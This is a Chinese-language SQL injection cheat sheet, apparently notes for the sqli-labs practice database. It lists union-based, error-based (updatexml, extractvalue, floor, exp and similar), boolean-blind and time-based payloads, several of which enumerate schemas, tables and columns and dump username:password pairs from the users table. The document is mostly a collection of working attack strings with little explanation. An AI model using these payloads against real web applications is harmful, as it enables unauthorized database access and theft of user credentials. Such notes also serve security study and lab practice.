order by:判断有多少字段
and length(database())=8 -- + # 判断当前数据库名长度
1.暴库:select group_concat(schema_name) from information_schema.schemata;
2.暴表1:select group_concat(table_name) from information_schema.tables where
table_schema='security'; 加引号
暴表2:select table_name from information_schema.tables where
table_schema='security' limit 3,1; 加引号
3.暴字段1:select group_concat(column_name) from information_schema.columns where
table_name='users' and table_schema='security'; 加引号
暴字段2:select column_name from information_schema.columns where
table_name='users' and table_schema='security' limit 1,1;
4.暴字段值:select group_concat(username,0x3a,password) from security.users; 不加
引号
select group_concat(username,0x3a,password) from security.users; # 查询指定库中表
的某些字段值
payload: id=-1' union select 1,2,group_concat(username,0x3a,password) from
security.users -- +
报错常用函数
# 1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat((select
user()),floor(rand(0)*2))x from information_schema.tables group by x)a);
# 2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
# 3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
# 4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
# 5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
# 6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
# 7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
# 8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
# 9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
# 10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));
暴库
substr
payload: id=1' and (updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),0,32),0x7e),1)); --+
limit
payload: id=1' and (updatexml(1,concat(0x7e,substr((select schema_name from information_schema.schemata limit 0,1),1,32),0x7e),1)); -- +
' OR updatexml(1,concat(0x2a,substr((select schema_name from information_schema.schemata limit 0,1),1,32),0x7e),1) OR '
暴表
payload: id=1' and (updatexml(1,concat(0x7e,substr((select
group_concat(table_name) from information_schema.tables where
table_schema='security'),1,32),0x7e),1)); -- +
暴字段
payload: id=1' and (updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,32),0x7e),1)); -- +
暴数据
payload: id=1' and (updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from security.users),1,32),0x7e),1)); -- +
布尔盲注
判断闭合符号
输入 id = 1' and 1 -- + 页面内容显示正常
输入 id = 1' and 0 -- + 页面显示不正常
由此判断出闭合符号位单引号
在进行暴库&&暴数据时都要先判断sql查询结果的长度,可以用二分法快速判断
延时注入:
and if(length(database()) = 8, sleep(3),1) -- + 判断长度
暴库
payload: id=1' and if((substr((select group_concat(schema_name) from information_schema.schemata),1,1)='i'),sleep(3),1) -- +
暴表
payload: id=1' and if((substr((select group_concat(table_name) from
information_schema.tables where table_schema='security'),1,1)='e'),sleep(3),1) -
- +
暴字段
payload: id=1' and if((substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,1)='i'),sleep(3),1) -- +
暴数据
payload: id=1' and if((substr((select group_concat(username,0x3a,password) from
security.users),1,1)='d'),sleep(3),1) -- +
联合查询:
select group_concat(schema_name) from information_schema.schemata; # 查询所有库
名,并拼接为一条数据
payload: id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata -- +
select group_concat(table_name) from information_schema.tables where table_schema='security'; # 查询security库中所有表名,并拼接为一条数据
payload: id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- +
select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'; # 查询 security 库中 users 表中的所有字段值,拼接为一条数据
payload: id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' -- +
select group_concat(username,0x3a,password) from security.users; # 查询指定库中表的某些字段值
payload: id=-1' union select 1,2,group_concat(username,0x3a,password) from security.users -- +